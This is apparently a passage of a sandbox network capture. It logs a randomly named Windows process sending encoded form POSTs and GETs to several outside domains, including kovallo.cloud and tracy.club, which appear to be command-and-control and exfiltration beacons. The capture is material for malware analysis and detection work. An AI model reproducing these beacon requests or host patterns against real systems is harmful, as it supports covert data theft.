                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
Sep 22, 2024 17:41:20.781038046 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:20 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49721 | Destination IP: 81.2.196.19 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:41:22.527823925 CEST | 710 | OUT | POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=dsMqkxxmQj+V89g7hhWUpVhd2T3eMI02jVNw8Z993Z/zV7YzOWr8kjzsnAbcdQMP0M8IhaIMEj5fCFYZlg9FezoBXJHjGFN3Gdgz4W4mCr2n+JSvTG1v3RRSP/KpDv/E/RjytqzIpy1KyBmzDc1Uo9dekHgqUzPMYXV+R+ssS4TSIxgWtKtCQK8S7lnejjUe81rs4OcL2eN33QaZf1X9tTI5qgkRdZHzbQ==
Sep 22, 2024 17:41:23.331474066 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:23 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49722 | Destination IP: 81.2.196.19 | Destination Port: 80 | PID: 4508 | Process: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
Timestamp | Bytes transferred | Direction | Data
Sep 22, 2024 17:41:25.065902948 CEST | 1723 | OUT | POST /kmgk/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.kovallo.cloud
                                                                Origin: http://www.kovallo.cloud
                                                                Referer: http://www.kovallo.cloud/kmgk/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Sep 22, 2024 17:41:25.711596012 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Content-Encoding: gzip


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.6 | 49723 | 81.2.196.19 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:27.609587908 CEST | 421 | OUT | GET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.kovallo.cloud
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:28.289849043 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:41:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 548
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                5 | 192.168.2.6 | 49725 | 85.159.66.93 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:33.441397905 CEST | 707 | OUT | POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pBz40UG7SAOkKiLx4461aNq6djbZ+FKKXWnDCNmFvRcM+7rPxgQBGH4xXvF3u+7+3EaUkxNSIu+tkiX2NJdxWvyirU9EnQDSNr6GYCEmBbGOfxLLE0C9h8DYRee3hsQ9lJAzSwE0Oh4qZ8FAEXUFzIuMjh20+FvZe/9iBblfd7XdnklUlyYpnWR3B99mcSAcj


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                6 | 192.168.2.6 | 49726 | 85.159.66.93 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:35.986820936 CEST | 731 | OUT | POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfaXYjHCMktvScM+zLP0kQB3H48qvHju+7a3EYMkx8SLuutqp32TNdxWvyirU9BvQDKNrpeYTQ6GWmOc2LLEwC9t8DY3eavLsSFlJBDSxRAJ6oqDxlB3G1E+Odh0mFQ7QohrzrjbHWf+pH9lknMXy4pNURPBvqq7d05An26jqcw6671jjfLq2tNYaw==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                7 | 192.168.2.6 | 49728 | 85.159.66.93 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:38.537328005 CEST | 1744 | OUT | POST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfSXYQPCNFtvTcM+9rP1kQBqH8ZhvH/U+5S3F7EkzO6LgutqmX2OJdwev2GvU8xvQDKNrouYTEmGF2OfxLLY0C9B8C9CeajxsjllQirSzjoJn4qF/FBvGwd+Od94mE0dQvRrx/ayUHrk12sG2VF89Y9YSx39kIvNQkAprAOHudpK0Kx5oICp2vs8KGWwV329/dGsSA3c/BT+JpFohLEjFVOwaohl6ylp71IldUfljPbz+VQpNmNVNcEvbdC0b+VMzjIMPkDOXWyF6dAgXbbKEdegJZRdm4Zz7Wl/WBtLzpnHr93WAgv1e/ufG8MWvd/CurLtXQdzgDXnnq3ypcmuWeud414pid0jJuh+LErlKbGJeT5PbCWxOnSvAZtMCHYzPyXY3WU+N83y2CPvbxfCCxMweGOalSpDY+S5nP0J51ViSw4x/n4fFFSZrhu8rrYR21Q8jm+xVwCBYWfM/BbYxUt51IaCFxEYztP+ZT1pNDDFocNhmLeBndtf2mE6Yb65VPp+5vbF4Sx+TaoBwVEn6RUaoSFO/uD92+R2llIeqMCrR8HeFhGpnXFOJUSv/PfHGpkbUAFbxm2oUul80hBHeC/QYPFBkJU7+i/6B8JIu0EljNP81ujpGmqtJPopHudMR0sm8YBGdGkCnJ816qZoHRfJmwFcYZ25Wy1DWocnD9jKo/ofvgPyDVvcTASV1yNmfWLinyCEbfjq9wh+XEO+V2BY1gmOGB7zpu63NY8Q1bjRcXNMBIKCf+JmGmeeAWKN1sPFvCpasKxrQxcFheeEjt8bNafyZQz2fzYoqN9B0kXP6FH/hmZjDMZvg/fiPz/JsgLfSPe321sclxBwtYvkFuZt3XRPQ1SewUZqc1WjTs5RfYTuuvRuoegHX1X3mlVhIke9hopq6eVKeDh2WxdyYN7uoZ2n/0+EFbyTVDJ+QBFUHuq0hrYMjR9sWotH7NEaGXRP+ [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                8 | 192.168.2.6 | 49729 | 85.159.66.93 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:41.252269030 CEST | 428 | OUT | GET /becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.sppsuperplast.online
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:41.844948053 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                                Server: nginx/1.14.1
                                                                Date: Sun, 22 Sep 2024 15:41:41 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                X-Rate-Limit-Limit: 5s
                                                                X-Rate-Limit-Remaining: 19
                                                                X-Rate-Limit-Reset: 2024-09-22T15:41:46.7226135Z


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                9 | 192.168.2.6 | 49730 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:47.003547907 CEST | 677 | OUT | POST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=uPfqn9UBI+zzepZGgbLYn5aG1tFCIsWsuz7gwaALI/kMf5nxi5sjxLt0TJSI2o1v6MQFXlWxJUe4ZKgaKJ0jcq4pwqbZPeJyTsLKD5vLfiudUGcDGfEJbqqNEAhXF8ivSbkYH7S7LV1KJRZtA3m30EugTvHx+gjs+6BIBQSSvsqlxPZunM24rcvTjGYWXPKmpUncDhgjvVFE


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                10 | 192.168.2.6 | 49731 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:49.552201033 CEST | 701 | OUT | POST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=uPfqn9UBI+zzeJpGi6LY2paHr9FCecWouz3gwexOPNAMfZ3xw4sjyLt0L5SNyo106MUnXl6xJUK4ZLQaJ+Asd64r9KbXMuJyTsLKD6TtfkGdUXsDH7YOEaqOTwhXXMirSbk2H6fWLX9KJQFtAmm29EumdPGa1ieD4IUfCBuQvvyt05Y07/2b5MPRjEAkXvKMrUfcR2sEghgnmr5SQRYvhHwlz1pTGQGYng==


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                11 | 192.168.2.6 | 49732 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:52.532500982 CEST | 1714 | OUT | POST /fl4z/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.tracy.club
                                                                Origin: http://www.tracy.club
                                                                Referer: http://www.tracy.club/fl4z/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=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 [TRUNCATED]


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                12 | 192.168.2.6 | 49733 | 3.33.130.190 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:41:55.078181028 CEST | 418 | OUT | GET /fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.tracy.club
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:41:55.528479099 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                Server: openresty
                                                                Date: Sun, 22 Sep 2024 15:41:55 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 267
                                                                Connection: close
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL"}</script></head></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                13 | 192.168.2.6 | 49735 | 209.74.95.29 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:00.571456909 CEST | 680 | OUT | POST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Ascii: i4fTbV=CZZgZ8wRGz3hYt1ArIMYoF+sWvEdYpYVXoE4be4560yoiMJ5wQDRNAvHUIPxlChzgrdQG5+m5+ZPWBGCMVvu+gYY/TyYFLEvrsUfFPpR3ShoVH+nUwMBi6QUOr6ysnD9TkrX5mTbdkWrVB2/ZPYhMm/IvihQKKMuhcIbxx32ehrA1OHwF7ZiJKU65VFaUra7ulVAewogi+tQ
                                                                Sep 22, 2024 17:42:01.169397116 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                Date: Sun, 22 Sep 2024 15:42:01 GMT
                                                                Server: Apache
                                                                X-Frame-Options: SAMEORIGIN
                                                                Content-Length: 13928
                                                                X-XSS-Protection: 1; mode=block
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                Sep 22, 2024 17:42:01.169428110 CEST | 1236 | IN | Data Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                Sep 22, 2024 17:42:01.169445992 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                Sep 22, 2024 17:42:01.169462919 CEST | 672 | IN | Data Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                Sep 22, 2024 17:42:01.169481993 CEST | 1236 | IN | Data Raw: 65 72 74 79 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d
                                                                Data Ascii: erty</a> </div> </nav> </div> ... Navbar End --> ... Header Start --> <div class="container-fluid header bg-white p-0"> <div class="row g-0 align-items-center
                                                                Sep 22, 2024 17:42:01.169502974 CEST | 224 | IN | Data Raw: 3d 22 30 2e 31 73 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 33 35 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: ="0.1s" style="padding: 35px;"> <div class="container"> <div class="row g-2"> <div class="col-md-10"> <div class="row g-2">
                                                                Sep 22, 2024 17:42:01.169517040 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                Sep 22, 2024 17:42:01.169533014 CEST | 1236 | IN | Data Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                                Sep 22, 2024 17:42:01.169548988 CEST | 448 | IN | Data Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                                Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                                Sep 22, 2024 17:42:01.170106888 CEST | 1236 | IN | Data Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                Sep 22, 2024 17:42:01.174412012 CEST | 1236 | IN | Data Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                14 | 192.168.2.6 | 49736 | 209.74.95.29 | 80 | 4508 | C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Sep 22, 2024 17:42:03.113465071 CEST | 704 | OUT | POST /ha8h/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.sterkus.xyz
                                                                Origin: http://www.sterkus.xyz
                                                                Referer: http://www.sterkus.xyz/ha8h/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
